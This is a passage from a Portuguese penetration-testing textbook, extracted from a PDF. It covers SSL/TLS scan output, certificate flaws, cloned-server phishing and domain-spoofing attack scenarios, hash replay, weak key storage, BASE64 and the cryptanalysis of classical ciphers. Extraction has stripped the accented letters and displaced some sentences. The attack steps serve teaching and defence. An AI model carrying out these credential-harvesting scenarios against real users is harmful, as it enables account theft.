SSLv3
128 bits
ADH-AES128-SHA
Rejected
TLSv1
256 bits
DHE-RSA-AES256-SHA
Rejected
TLSv1
256 bits
DHE-DSS-AES256-SHA
Accepted
TLSv1
256 bits
AES256-SHA
Rejected
TLSv1
128 bits
ADH-AES128-SHA
Rejected
TLSv1
128 bits
DHE-RSA-AES128-SHA
Rejected
TLSv1
128 bits
DHE-DSS-AES128-SHA
Accepted
TLSv1
128 bits
AES128-SHA
...
...
...
415
Prefered Server Cipher(s):

SSLv3
128 bits
RC4-SHA
TLSv1
128 bits
RC4-SHA
SSL Certificate:
Version: 2
Serial Number: -4294967295
Signature Algorithm: sha1WithRSAEncryption
Issuer: /C=US/O=Google Inc/CN=Google Internet Authority
Not valid before: Oct 21 19:44:58 2010 GMT
Not valid after: Oct 21 19:54:58 2011 GMT
Subject: /C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.
google.com
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:96:2a:f2:79:d6:2b:e9:49:ae:96:1b:60:12:39:
ac:9c:b2:ee:84:ac:b9:5a:7e:0e:b2:ef:7c:0a:5a:
7b:f0:82:db:52:c5:09:13:1f:65:38:e7:da:af:4b:
53:39:fe:50:3d:2a:d5:e9:de:31:3a:a5:05:1c:65:
b6:59:32:de:56:90:a0:c4:09:de:dc:e3:4b:17:b6:
bc:59:47:fa:e8:95:5b:d5:52:ba:2f:c7:95:74:8d:
e4:d1:17:ae:06:97:ba:f6:22:6e:48:85:aa:8d:c3:
e8:da:74:60:4f:9a:a3:43:4f:6e:e2:29:eb:e0:aa:
9e:bb:a7:ed:16:6a:17:7a:35
Exponent: 65537 (0x10001)
416
X509v3 Extensions:
X509v3 Subject Key Identifier:
A8:C9:67:22:2E:EE:32:78:B3:E2:B9:18:5B:62:87:1F:87:2D:4E:42
X509v3 Authority Key Identifier:
...
Problemas com o certificado digital

Para verificar se h algum problema com o certificado digital utilizado por um ser-
vidor, basta acessar com um navegador web qualquer pgina da aplicao servida por
HTTPS. Se algo no estiver bem configurado, uma advertncia parecida com a ilustrada
pela Figura 9.1 ser exibida, indicando uma vulnerabilidade. Situaes relacionadas
ao certificado instalado, que impedem que a negociao SSL/TLS seja realizada com
sucesso incluem:
1 Certificado expirado.
1 Certificado vlido a partir de data posterior atual.
1 Certificado autoassinado.
1 Certificado emitido por autoridade certificadora desconhecida pelo navegador.
1 Certificado revogado.
1 Assinaturas digitais invlidas na cadeia de certificao.
1 Nome de domnio do stio web no incluso no(s) contido(s) no certificado.
Quando a aplicao sofre dessa vulnerabilidade, o usurio fica acostumado com a apresentao
da mensagem de erro, pelo navegador web, e continua o acesso, ignorando-a. Isso abre caminho
para um ataque, que permite coletar identificadores de usurio e as respectivas senhas:
1.
O atacante prepara um servidor falsificado, com cpia da tela de autenticao da aplicao vulnervel.
2. Por meio de um ataque de redirecionamento ou de engenharia social, o usurio condu-
zido ao servidor ilegtimo. Como o navegador sempre reclama do certificado apresentado

na negociao SSL/TLS, o usurio no percebe que est acessando uma pgina clonada e
fornece identificador e senha, para autenticar-se.
3. O sistema forjado captura as credenciais fornecidas, realiza a autenticao na aplicao
original e redireciona o usurio para o servidor correto.
Acesso a domnio no verificado

Este problema decorre de um cliente web que no verifica se o nome de domnio da apli-
cao sendo acessada o mesmo que o contido no certificado digital apresentado pelo
servidor. Quando este passo no executado, a conexo pode ser estabelecida com um
servidor falsificado, caso seja possvel redirecionar o usurio.
Antigamente, muitos clientes SSL no efetuavam a verificao e eram, portanto, vulnerque no realizem o teste e, assim, somente clientes proprietrios devem ter este aspecto
verificado em um teste de invaso.
Caso seja necessrio, o procedimento de teste consiste em montar um servidor web e
configur-lo com um certificado vlido para um domnio qualquer e com chave privada
correspondente. Em seguida, deve-se enganar o cliente web para acessar esse servidor, via
HTTPS, como se fosse o original de um domnio arbitrrio. Isso pode ser realizado em sistemas Windows e Linux, pela incluso de uma linha no arquivo hosts, mapeando o domnio
desejado para o endereo IP do servidor de teste. Caso o acesso seja realizado sem nenhum
problema, o cliente no realiza a verificao e vulnervel.
veis. Hoje em dia, porm, muito raro encontrar navegadores web ou clientes SSL/TLS
417
Um possvel cenrio de explorao da vulnerabilidade descrito a seguir:

1. O atacante obtm um certificado digital e chave privada correspondente vlidos de um
domnio XYZ qualquer, por meio da explorao de um servidor vulnervel, ou gerando
as chaves e comprando o certificado de uma autoridade certificadora com processos de
verificao de identidade ineficazes.
2. Um servidor web criado com contedo clonado do domnio ABC e com HTTPS
configurado com o par de chaves do primeiro passo.
3. Um e-mail enviado a um conjunto de vtimas para que acessem o servidor malicioso,
como sendo do domnio ABC.
4. Durante a negociao SSL, o servidor clonado envia o certificado do domnio XYZ para
o navegador, que verifica, com sucesso, data de validade, assinaturas da cadeia de
certificao e estado no revogado, mas no valida o domnio. Como nenhum erro
ocorre, a chave pblica extrada e utilizada para compor a mensagem client_key_
exchange, enviada, em seguida, ao servidor.
5. O servidor capaz de extrair o contedo da mensagem client_key_exchange, pois
possui a chave privada associada ao certificado do domnio XYZ, e completar as operaes para estabelecimento de chaves.
6. As mensagens change_cipher_spec e finished so trocadas entre as duas partes e o
protocolo encerra-se normalmente, com a vtima conectada a um servidor falsificado.
Uso de protocolos proprietrios

Projetar protocolos seguros uma tarefa to difcil quanto criar bons algoritmos cripto-
grficos. Assim, a chance de um protocolo caseiro ser livre de vulnerabilidades extremamente baixa, ainda mais quando ele a criao de uma equipe no especializada.
Similarmente, a anlise de segurana de protocolos criptogrficos tambm requer conhecimentos avanados e especficos que esto muito alm do escopo deste texto. Um ponto
de partida para aqueles que queiram se aprofundar neste assunto o Handbook of Applied
Cryptography (Menezes et al., 2001). Pelos motivos expostos, esta seo limitar-se- a enumerar, com base na obra supracitada, os principais tipos de ataques contra protocolos de
segurana, e a fornecer um nico exemplo:
1 Personificao o atacante se passa por uma das entidades participantes do protocolo.

1 Repetio dados obtidos de execues passadas do protocolo so reenviados a um
ou mais participantes do protocolo.
1 Intercalao informaes obtidas de mltiplas execues, antigas ou em andaTeste de Invaso de Aplicaes Web
mento, so combinadas em uma nova execuo.
418
1 Reflexo uma mensagem de protocolo recebida de uma entidade devolvida para

o remetente.
1 Espera forada uma mensagem interceptada e encaminhada em um momento

posterior.
Considere-se como exemplo o protocolo de autenticao ilustrado na Figura 9.3:

1.
Usurio fornece identificador e senha em tela de autenticao.
2. O sistema calcula o hash da senha, antes de envi-la ao servidor por meio de um canal
inseguro. A justificativa para isso que, dada a resistncia da pr-imagem, computacionalmente infactvel recuperar a senha em claro a partir do hash capturado.
3. O servidor recebe as credenciais do usurio e faz uma busca na base de autenticao a
partir do identificador do usurio.

4. Se o hash da senha recebida for idntico ao armazenado na base, o usurio conside-
rado autntico.
Senha: fs@.79k8
F.Hash
Alice
Alice, 0x0243af7a23548a8
0eeba8f951314fa8c
canal inseguro
Id, hash recebido
=?
Figura 9.3
Protocolo de autenticao vulnervel.
Id, 0x0243af7a23548a8
0eeba8f951314fa8c
Qual a vulnerabilidade apresentada por este esquema? O problema reside na transmisso

das credenciais por um canal no protegido. No caso, irrelevante saber a senha em claro,
pois o hash dela que est sendo utilizado para autenticar o usurio. Desse modo, uma
pessoa maliciosa pode, em um ataque de repetio, capturar o trfego, obter o hash e
reenvi-lo posteriormente ao servidor para autenticar-se de maneira ilegtima.
Tipos de vulnerabilidades
Que tipos de vulnerabilidades podem estar presentes na configurao de um tnel SSL/TLS?
Contramedidas
Os seguintes pontos devem ser observados para evitar-se uma comunicao insegura
com a aplicao web:
1 No utilize protocolos de segurana desenvolvidos caseiramente.

1 Configure o servidor para aceitar apenas sutes criptogrficas fortes, descartando,
assim, algoritmos de exportao, datados e quebrados.
Que falhas recentes foram encontradas nos protocolos SSL/TLS?
419
1 No utilize verses de SSL anteriores a 3.0 e prefira o uso do protocolo TLS.

1 Compre e instale um certificado digital de uma autoridade certificadora conhecida e
confivel. No deixe que o certificado expire, adquirindo um novo antes que isso acontea.
1 Para aplicaes internas, caso uma infraestrutura de chaves pblicas prpria seja utilizada, instale o certificado raiz correspondente nos navegadores web dos usurios.
1 No permita que um recurso servido por meio do protocolo HTTPS tambm seja
acessvel por HTTP.
1 Proteja a chave privada do servidor, preferencialmente, partilhando-a entre vrios custodiantes e fornecendo-a ao sistema, sempre que necessrio, por meio de cerimnia oficial.
1 Caso implemente o lado cliente dos protocolos SSL/TLS, lembre-se sempre de

verificar a validade do certificado recebido e conferir o nome de domnio acessado
contra o contido no certificado.
Vulnerabilidades no armazenamento de informaes

relativamente comum encontrar sistemas que apenas se preocupam em proteger as
informaes em trnsito e que se esquecem (ou ignoram) de proteg-las durante

o armazenamento.
Nesse caso, uma nica vulnerabilidade no servidor pode ser suficiente para permitir a recuperao das informaes que esto em claro no disco. O usurio malicioso, obviamente, no
se esforar para quebrar os mecanismos criptogrficos utilizados na proteo do canal de
comunicao, na presena de um caminho mais fcil a ser trilhado.
Por outro lado, quando existe a preocupao em cifrar dados sigilosos, a maior vulne-
rabilidade encontrada com relao proteo das chaves criptogrficas utilizadas.

Normalmente, os desenvolvedores as embutem no cdigo, achando que, uma vez compilados os programas, ser difcil que algum as recupere.
Este pensamento, muito comum, infelizmente, est equivocado. Por exemplo, se a chave foi
colocada como uma cadeia de caracteres, basta utilizar um comando como o strings do
Linux, para encontrar a informao desejada. Caso a chave seja ofuscada, tcnicas de depurao do programa podem ser empregadas, chegando-se ao mesmo resultado.
Mesmo que fosse impossvel descobrir a chave, por meio da anlise do binrio, tal prtica
fere os preceitos de gerenciamento de chaves criptogrficas. O motivo que a chave teria
criptoperodo infinito, isto , ela nunca expiraria, salvo se novo binrio fosse gerado, com
substituio da chave. Note-se que o objetivo em se estabelecer um tempo mximo para o
uso de uma chave limitar: a quantidade de texto cifrado para criptoanlise; o montante de
informao em caso de comprometimento; o uso do algoritmo ao tempo de vida esperado;
420
o tempo disponvel para ataques de fora bruta (Menezes et al., 2001).

Pensando no ciclo de vida das chaves criptogrficas, um ponto que merece, mas no
recebe, bastante ateno a fase de criao, que deve empregar mtodos que garantam
um bom nvel de aleatoriedade.
No incomum encontrar programas que baseiam a gerao de chaves em funes como
rand(), na linguagem C, e em classes como Random, em Java. Ou, pior ainda, empregam
cadeias fixas como 01234567..., 000000... e ffffff..., as quais, dada a frequncia com que
aparecem, so candidatas naturais a serem testadas.
DES
Data Encryption
Standard uma cifra
simtrica de blocos,
definida pelo padro
americano FIPS 46-2,
que utiliza blocos de
64 bits e chaves de
56 bits. Devido ao
pequeno tamanho, foi
quebrada, em 1998,
por uma mquina
criada especificamente
para executar busca
exaustiva de chaves.
Muitas empresas utilizam cifras caseiras ou clssicas na proteo de informaes

valiosas, conforme constatado em diversas auditorias e anlises de vulnerabilidades
realizadas pelo autor deste texto.
Na grande maioria dos casos, empregavam-se cifras de substituio monoalfabtica
com chaves fixas como parte da transformao; em outros, as informaes eram apenas
codificadas em BASE64. No nem necessrio dizer que todas essas solues fornecem um
nvel de segurana quase nulo. Um pouco melhor, mas ainda problemtico face ao valor das
informaes protegidas, o uso de DES simples, contra o qual ataques de fora bruta so
viveis a um custo relativamente baixo.
Aspectos mais sutis, com relao ao armazenamento seguro de informaes, esto relacionados a detalhes de desenvolvimento da soluo.
Por exemplo, se as posies de memria contendo chaves criptogrficas no forem zeradas

Em sistemas
operacionais, o
mecanismo em que
pginas de memria
so copiadas para disco,
quando no h mais
espao disponvel na
memria principal do
computador, de modo a
permitir que as pginas
necessrias ao processo
ativo sejam carregadas.
ASCII
Acrnimo para
American Standard
Code for Information
Interchange,
um esquema de
codificao que mapeia
caracteres para valores
numricos entre 0 e
255, considerando,
tambm, a parte
estendida da tabela.
Figura 9.4
Mapeamento utilizado em BASE64.
antes de liberadas, ou se essas mesmas regies forem para disco, no processo de swap do
sistema operacional, acesso no autorizado s chaves poder ocorrer.
Uso de BASE64
BASE64 o nome dado a um grupo de esquemas de codificao, que representam

cadeias de octetos como caracteres imprimveis, pertencentes a um conjunto de
65 caracteres ASCII.
Um deles, o caractere =, utilizado para preenchimento do resultado, para que o tamanho

seja sempre mltiplo de quatro. Os demais so mapeados, conforme Figura 9.4, para os
valores 0 a 63, que compreendem todas as possibilidades de um nmero de seis bits.
Valor
10
11
12
13
14
15
Cdigo
Valor
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Cdigo
Valor
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Cdigo
Valor
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
Cdigo
A entrada processada da esquerda para a direita, trs octetos por vez, os quais
resultam em quatro caracteres codificados. Caso o tamanho da mensagem no seja mltiplo de trs, o ltimo bloco conter um ou dois octetos e dever ser tratado de maneira
especial, conforme Figura 9.5 e Figura 9.6, respectivamente:
1 Um octeto quatro bits 0 devem ser adicionados ao final do octeto, de modo a completar 12 bits, que so ento mapeados para dois caracteres, concatenados com ==.
Swap
1 Dois octetos dois bits 0 devem ser adicionados ao final dos octetos, completando
18 bits, que so ento mapeados para trs caracteres, concatenados com =.
421
octeto
Bits adicionados
0 0 0 0
Codicado 1 Codicado 2
Figura 9.5
Codificao em
BASE64, quando o
ltimo bloco possui
um octeto.
Preenchimento
1 octeto
Bits adicionados
2 octeto
0 0
Codicado 1 Codicado 2 Codicado 3
Figura 9.6
Codificao em
BASE64, quando o
ltimo bloco possui
dois octetos.
=
Preenchimento
Um exemplo completo de codificao pode ser observado na Figura 9.7. A primeira linha
ilustra a entrada, em caracteres imprimveis, correspondente palavra Teste; na segunda,
esto representados os valores ASCII de cada caractere, em binrio, alm dos dois bits 0
adicionados; a seguinte mostra o agrupamento em blocos de 6 bits e a ltima, o resultado
em BASE64. Para realizar a decodificao, basta desfazer cada um dos passos, iniciando pelo
ltimo deles.
Um ponto importante, que deve ser notado, que os processos de converso no
dependem de nenhum segredo e, assim, qualquer pessoa capaz de execut-los.

Isto implica que o mecanismo no deve nunca ser utilizado para proteo do sigilo de
informaes.
Figura 9.7
Exemplo de codificao em BASE64.
Dado o alfabeto caracterstico utilizado, muito fcil reconhecer dados codificados em

BASE64. Em um teste de invaso, sempre que informaes nesse formato forem encontradas, deve-se proceder decodificao delas, para constatar se o mecanismo no est
sendo incorretamente utilizado para prover confidencialidade. Algumas vezes, pode ocorrer
de haver um prefixo ou sufixo, normalmente, em outro formato, que precisa ser ignorado
para que a recuperao da informao original seja possvel.
BASE64
422
seguro utilizar BASE64 para proteo de informaes sensveis? Justifique sua resposta.
Identificao e quebra de cifras clssicas

Infelizmente, ainda hoje, encontram-se sistemas que utilizam cifras clssicas na proteo
de informaes sensveis. Esses algoritmos criptogrficos histricos so quebrados facilmente, mesmo sem a ajuda de computadores, o que torna o fato bem preocupante.
Como h uma chance no marginal de se deparar com esse cenrio, importante saber como
so os processos de criptoanlise que podem ser empregados em cada caso. Afinal, a subtrao de informaes de um ambiente um dos principais objetivos de um teste de invaso.
Conceitos adicionais sobre cifras

Cifras de substituio simples e de transposio so duas classes bsicas, mas impor-
tantes, de cifras simtricas. As primeiras, tambm chamadas de cifras monoalfabticas,

definem um mapeamento entre o alfabeto em claro para o de ciframento, que utilizado
na substituio de cada elemento do texto original por outro, como exemplificado pela
Figura 9.8. As de transposio, por sua vez, operam sobre blocos de tamanho fixo pr-estabelecido, permutando os elementos de cada um deles, segundo uma regra definida.
Uma terceira classe de cifras, a de substituio polialfabtica, trabalha com um conjunto
de n mapeamentos de substituio, que so aplicados ordenada e ciclicamente aos
caracteres do texto em claro.
O objetivo evitar que as frequncias dos elementos da mensagem original sejam refletidas
no texto cifrado, como ocorre com a letra e, no exemplo da Figura 9.8. Embora isto evite
alguns ataques, outros ainda so possveis, salvo em alguns casos, em que algumas condies muito especiais so satisfeitas. As cifras clssicas que sero analisadas nesta seo,
basicamente, so variaes desta e da primeira categoria.
Figura 9.8
Exemplo de cifra
de substituio
simples.
Com o mesmo propsito acima mencionado, cifras de substituio homofnica mapeiam
para cada caractere do alfabeto original um conjunto de t smbolos, com a restrio de

no haver elementos comuns entre os diversos conjuntos.
Claramente, em um esquema assim, o alfabeto de ciframento deve conter, no mnimo, t vezes
o nmero de elementos do original, seno no possvel satisfazer o requisito mencionado.
mento selecionado aleatoriamente do grupo mapeado para ele. Desse modo, a frequncia de
ocorrncia de um elemento no texto em claro dividida entre t smbolos no texto cifrado.
Por conveno, quando cifras clssicas so utilizadas, o texto em claro representado
em letras minsculas e o cifrado em letras maisculas. Alm disso, o alfabeto original e o
de ciframento so idnticos, apesar disso no ser um requisito fundamental. Finalmente,
assume-se que o atacante sabe a lngua da mensagem original e a cifra que foi utilizada
para proteg-la.
O processo de ciframento de um caractere, por sua vez, consiste em substitu-lo por um ele-
423
ndice de coincidncia (IC)

O primeiro passo antes de atacar um texto cifrado identificar o tipo de algoritmo que
foi utilizado, pois os mtodos de criptoanlise diferem para cada classe. Especificamente
para os criptossistemas histricos, o objetivo determinar se foram empregadas cifras
monoalfabticas, polialfabticas ou de transposio. O ndice de coincidncia, introduzido por William Friedman em 1922 (Friedman, 1922; Swenson, 2008), uma ferramenta
estatstica que pode ser utilizada para este propsito, pois ela mede a distribuio dos
caracteres em um texto.
Para compreender como calcular o ndice, sero utilizados alguns conceitos elementares de
probabilidade. Imagine-se uma urna contendo n papis, cada um com uma nica letra do
alfabeto latino, denotado por A. Se forem retirados, aleatoriamente e sem reposio, exatamente dois papis, qual a probabilidade de que contenham a mesma letra? A resposta desta
pergunta dada pelo ndice de coincidncia.
Seja n , A, o nmero de ocorrncias da letra na urna. Dessa definio segue imediata-
mente que n = na + nb + ... + nz , pois, a soma das frequncias individuais igual ao nmero total
de papis. A chance de se retirar a letra a nas duas escolhas de na /n x (na 1)/(n 1) = pa ,
pois o papel no devolvido ao recipiente. Semelhantemente, para a letra b, a probabilidade

de nb /n x (nb 1)/(n 1) = pb , e assim por diante. Uma vez que esses eventos so mutuamente
exclusivos, a probabilidade procurada a soma de p , com A:
IC(n) =
A
n_ (n_-1)
P =
n (n-1)
No caso de uma distribuio homognea, na = n/26, para toda letra do alfabeto. Substituindo
na frmula acima, obtm-se:
IC(n) =
A
n
n
x(
- 1)
26
26
=
n (n-1)
n - 26
n-26
n-26
26
=
= 26 x
26 (n -1)
26 26 (n -1)
26n - 26
Supondo uma enorme quantidade de papis, isto , com n tendendo ao infinito, possvel
calcular o ndice por meio do limite da funo:
lim IC(n) = lim
ng
ng
n - 26
26n - 26
L'Hpital
lim IC(n) =
ng
1
26
~ 0,03846
=
Este valor de IC, denotado por IC A , reflete uma sequncia de letras aleatoriamente selecionada
a partir de uma distribuio uniforme. Para um texto em uma lngua qualquer, entretanto, as
frequncias no so homogneas, mas, sim, apresentam um padro estatstico, que depende
do idioma. De modo a obter o ndice de coincidncia, nesses casos, deve-se atribuir os valores
424
correspondentes a n , A, e calcular o limite da funo IC(n), de maneira similar ao exemplo
acima. A Figura 9.9, adaptada de (Gaines, 1939 e Singh, 1999), ilustra as frequncias individuais
das letras em diversos idiomas e o ndice de coincidncia relacionado.
Figura 9.9
Tabela de frequncias individuais de
letras em diversos
idiomas.
Mas como o ndice de coincidncia pode ser utilizado com o propsito enunciado?
Recorde-se que em cifras monoalfabticas as frequncias das letras no texto em claro so

refletidas no texto cifrado, embora em smbolos diferentes, e observe-se que em cifras
de transposio elas no so alteradas. Isso implica que o IC, nesses dois casos, deve
ser prximo ao do idioma da mensagem. Por outro lado, quando cifras polialfabticas e
homofnicas so empregadas, a frequncia original das letras diluda no texto cifrado e,
portanto, o IC deve aproximar-se de IC A .
A cifra de Cesar, atribuda folcloricamente ao imperador romano Jlio Cesar, pertence

classe de algoritmos de substituio monoalfabtica e consiste em se trocar cada letra
do texto em claro por aquela situada trs posies adiante no alfabeto romano. Note-se
que neste esquema a transformao fixa e, logo, uma chave no utilizada.
Isto uma pssima prtica, pois requer que o algoritmo seja mantido em sigilo e, se
ele for comprometido, um novo mecanismo deve ser projetado para substitu-lo. Para
quebrar este criptossistema, basta tentar decifr-lo pelas vias normais, isto , substituir
cada letra do texto cifrado por aquela que ocupa a terceira posio anterior no alfabeto.
q
Cifra de Cesar
425
O mapeamento utilizado por esta cifra, bem como um exemplo, est ilustrado na Figura 9.10.
Cifra de deslocamento e ROT13

Conforme explicado anteriormente, uma das fraquezas da cifra de Cesar que ela utiliza
uma transformao fixa, sem chave.
Uma possibilidade de melhoria resulta na cifra de deslocamento, em que a rotao do
Figura 9.10
Mapeamento da
cifra de Cesar
e exemplo.
alfabeto latino parametrizada pelo valor da chave k. Desse modo, ao todo, existem
26 mapeamentos de ciframento possveis, que correspondem ao nmero total de chaves
aceitas. A cifra de Cesar, no caso, uma particularizao deste esquema, com k = 3, pois
este o nmero de vezes em que o alfabeto deslocado.
O exemplo abaixo, por sua vez, ilustra esta cifra com chave k = 10.
Um espao de chaves pequeno como este, porm, no acrescenta muito segurana,
uma vez que possvel executar um ataque de fora bruta, no qual todas as possibilidades so testadas, uma a uma. Disso, pode-se pensar erroneamente que, para obter
uma cifra segura, basta aumentar o nmero total de chaves.
Para esclarecer este ponto, considere-se que uma cifra simtrica um cofre, com segredo
de mil dgitos. Obviamente, quanto maior o comprimento deste valor, mais difcil varrer
todas as combinaes possveis. Mas para quebrar o sistema isto realmente necessrio? Depende! Se o mecanismo for fraco, o melhor ataque deixa de ser a fora bruta. Na
analogia, se o cofre for de madeira, quem vai se preocupar em testar todos os segredos?
muito mais fcil destruir o prprio cofre!
Como exemplo de criptoanlise, considere-se que o texto cifrado YKMAXGTIG foi interceptado. Sabendo que a cifra de deslocamento foi utilizada, deve-se tentar decifr-lo com cada
uma das chaves existentes, a partir de k = 1, at que texto legvel seja recuperado. Os passos
realizados neste processo, ilustrados na Figura 9.12, finalizam em k = 6, quando o texto em
claro seguranca encontrado.
426
Figura 9.11
Exemplo de cifra de
deslocamento com
chave k = 10.
0 a b c d e f g h i
Texto
candidato
j k l m n o p q r s t u v w x y z YKMAXGTIG
1
2
3
4
5
6
K
L
M
N
O
P
Mapeamento
k
C
D
E
F
G
H
D
E
F
G
H
I
E
F
G
H
I
J
F
G
H
I
J
K
G
H
I
J
K
L
H
I
J
K
L
M
I
J
K
L
M
N
J
K
L
M
N
O
L
M
N
O
P
Q
M
N
O
P
Q
R
N
O
P
Q
R
S
O
P
Q
R
S
T
P
Q
R
S
T
U
Q
R
S
T
U
V
R
S
T
U
V
W
S
T
U
V
W
X
T
U
V
W
X
Y
U
V
W
X
Y
Z
V
W
X
Y
Z
A
W
X
Y
Z
A
B
X
Y
Z
A
B
C
Y
Z
A
B
C
D
Z
A
B
C
D
E
A
B
C
D
E
F
xjlzwfshf
wikyverge
vhjxudqfd
ugiwtcpec
tfhvsbodb
seguranca
O algoritmo ROT13, assim como a cifra de Cesar, uma particularizao da cifra de
deslocamento, mas com chave k = 13.

O ponto interessante que os processos de ciframento e de deciframento podem utilizar
exatamente a mesma transformao, pois duas aplicaes consecutivas do algoritmo fazem
com que cada letra do texto em claro seja substituda por aquelas 26 posies adiante no
alfabeto, ou seja, por ela mesma. Devido a este fato, a quebra do ROT13 trivial, bastando
aplic-lo sobre o texto cifrado que se julga ser texto protegido pelo algoritmo.
Cifra de substituio monoalfabtica genrica

A principal fraqueza da cifra de deslocamento reside no uso de um espao muito pequeno
de chaves criptogrficas, que descrevem somente as permutaes baseadas na rotao do
alfabeto romano.
Para compensar este problema, uma cifra de substituio monoalfabtica genrica
permite que o mapeamento seja realizado para qualquer permutao do alfabeto de

entrada. Com isto, o total de chaves sobe para 26! = 403.291.461.126.605.635.584.000.
000 ~
= 288, o que ligeiramente superior a um algoritmo simtrico moderno com chave de
80 bits.
Uma vez que o espao de chaves deste esquema tem tamanho razovel para os dias
atuais, resta saber se o algoritmo tambm resistente, isto , se no h um ataque mais
eficiente que a busca exaustiva de chaves. O primeiro fato que deve ser levado em conta
que cifras de substituio simples apenas transferem as frequncias individuais dos
smbolos do texto em claro para outros caracteres no texto cifrado. Assim, por exemplo,
se a chave escolhida mapeia a letra a para J e existem 1 milho de as, no texto em
claro, a mesma quantidade de Js estar presente no texto cifrado. O segundo aspecto
importante que toda linguagem natural redundante, o que determina uma estrutura
caracterstica de frequncias e agrupamentos de letras (Menezes et al., 2001).
Sob a luz deste fato, a Figura 9.13 e a Figura 9.14 ilustram, respectivamente, os percentuais
de ocorrncia de cada letra nas lnguas inglesa e portuguesa.
Note-se que, no caso de nossa lngua nativa, as vogais respondem por aproximadamente
metade das letras em um texto. Este nmero bem inferior para o idioma norte-americano,
o qual gira em torno de 38%.
Figura 9.12
Exemplo de criptoanlise da cifra de
deslocamento.
B
C
D
E
F
G
427
Figura 9.13
Frequncias das
letras na lngua
inglesa.
Para enfatizar como as frequncias das letras em idiomas especficos so refletidas em

textos aleatrios, dois exemplos em ingls e dois em portugus sero fornecidos, juntamente com os respectivos histogramas. A partir deles, importante constatar que, para
textos de tamanho razovel, o padro da lngua mantido, o que ser muito til no processo
de criptoanlise da cifra de substituio monoalfabtica.
Texto em ingls #1
O primeiro exemplo em ingls, retirado da revista Scientific American, expe o processo que
resultou na extino dos Neandertais, que, por muito tempo, coexistiram com nossa espcie.
Apesar de o texto ser pequeno, as frequncias individuais das letras esto muito prximas s
esperadas pelo idioma, conforme pode ser observado na Figura 9.15. Perceba-se, entretanto,
que a ordem dos elementos mais comuns est um pouco diferente da lngua inglesa, embora
428
ainda dentro do erro estatstico.

Some 28,000 years ago in what is now the British territory of Gibraltar, a group of Neandertals eked out a living along the rocky Medterranean coast. They were quite possibly the last
of their kind. Elsewhere in Europe and western Asia, Neandertals had disappeared thousands of years earlier, after having ruled for more than 200,000 years. The Iberian Peninusla,
with its comparatively mild climate and rich array of animals and plants, seems to have been
the final stronghold. Soon, however, the Gibraltar population, too, would die out, leaving
behind only a smattering of their stone tools and the charred remnants of their campfires
(Wong, 2009).
Figura 9.14
Frequncias das
letras na lngua
portuguesa.
Figura 9.15
Comparao das
frequncias das
letras em ingls e
em um trecho de
artigo.
Texto em ingls #2
Este exemplo, extrado da revista Digital PhotoPro, apresenta o trabalho do fotgrafo
Stuart Weston. Observe-se, na Figura 9.16, que, embora as distribuies sejam parecidas, as
frequncias das letras mais comuns no esto muito aderentes estrutura da lngua. Esses
desvios, entretanto, so comuns para textos pequenos.
Stuart Weston is a multitalented bundle of energy who happens to make his living as a
fashion photographer. His previous careers include a stint as an aerospace engineer, and hes
apparently a talented drummer, painter and handyman. Hes currently building a log cabin
in the French countryside, which will be his respite from running a booming business one
that not only includes fashion photography, but also video production, graphic design and
postprocessing. It all started, though, because 30 years ago, he worked with a photographer
who was more interested in ogling models than he was in taking pictures (Savalich, 2009).
Texto em portugus #1
O seguinte trecho em portugus, de Mary Carmichael (2010), faz parte de uma matria que
trata da vacina contra a malria e foi publicada na edio brasileira da revista Scientific
American. Observando o histograma apresentado na Figura 9.17, fcil perceber como as
frequncias das letras do texto so muito prximas s da lngua, principalmente, para os
elementos mais comuns, com exceo da letra O.
Neste exato momento, em algum lugar do mundo numa placa de Petri em Baltimore,
talvez, ou nas glndulas salivares de um mosquito criado num laboratrio de Seattle, ou
ainda na corrente sangunea de um aldeo em Gana , est presente um composto qumico
que poder ajudar a erradicar a doena mais letal da histria da humanidade. Os cientistas
Figura 9.16
Comparao das
frequncias das
letras em ingls e
em um trecho de
artigo.
esto desenvolvendo muitas vacinas experimentais promissoras contra a malria, e, pela
429
primeira vez, uma delas atingiu a fase de testes avanados em humanos. Se esta ou outra
vacina potencial mostrar-se eficaz em humanos, mesmo que parcialmente, milhes de
crianas e mulheres grvidas podero ser salvas. Essa vacina seria a nica j desenvolvida
contra um parasita humano, um feito digno de Nobel. E poderia, na forma de sua primeira
gerao, ser distribuda na frica j em 2015 (Carmichael, 2010).
Texto em portugus #2
O texto a seguir, extrado da revista National Geographic, fala da expanso imobiliria que
vem ocorrendo na cidade de guas Claras, DF, para comportar a legio de pessoas que
esto se mudando para a capital, em busca de novos desafios de trabalho. Por meio de uma
rpida comparao dos histogramas da Figura 9.18, percebe-se que, alm das distribuies
Figura 9.17
Comparao das
frequncias das
letras em portugus
e em um trecho de
artigo.
semelhantes, as trs letras mais frequentes da lngua portuguesa ocupam os mesmos

postos no exemplo fornecido.
Futurismo a palavra da moda em guas Claras. Todo mundo usa, mas isso no quer dizer
que seu significado seja claro. Um dia depois da minha chegada, um corretor de imveis vem
conversar: O senhor precisa conhecer o nosso projeto. o que h de mais atual em termos
de futurismo, diz (mesmo sem entender nada, aceito um carto para visitar o estande de
vendas do edifcio). Mais do que antever o amanh, ou o dia incerto no qual a cidade que
emerge com velocidade estonteante estar definitivamente construda no Distrito Federal,
o futurismo um modo de explicar uma arquitetura que, acreditam os moradores, servir
para diferenciar seu novo hbitat. Ou seja, um estilo. Ou uma maneira curiosa de tentar
buscar identidade esttica em uma cidade de feies nicas no Brasil absolutamente
vertical, na qual centenas de espiges residenciais, finalizados ou em obras, se projetam
rumo aos cus do Planalto Central, anunciando um novo tempo nas adjacncias da capital
da Repblica (Ribeiro, 2011).
430
Figura 9.18
Comparao das
frequncias das
letras em portugus
e em um trecho de
artigo.
O mtodo conhecido por anlise de frequncias, introduzido no sculo IX pelo polmata
rabe Ab Ysf Yaqb ibn Is-hq ibn as-Sabbh ibn omrn ibn Ismal al-Kind, emprega
os conceitos recm apresentados, para quebrar cifras de substituio simples. O primeiro passo consiste em descobrir o idioma da mensagem original, o que fundamental
para saber quais so as frequncias esperadas de cada letra do alfabeto. Em seguida,
deve-se realizar a contagem de cada smbolo presente no texto cifrado sendo analisado.
Como cifras monoalfabticas apenas alteram a face de cada smbolo, mantendo a
distribuio geral de frequncias, razovel assumir que cada elemento do texto cifrado
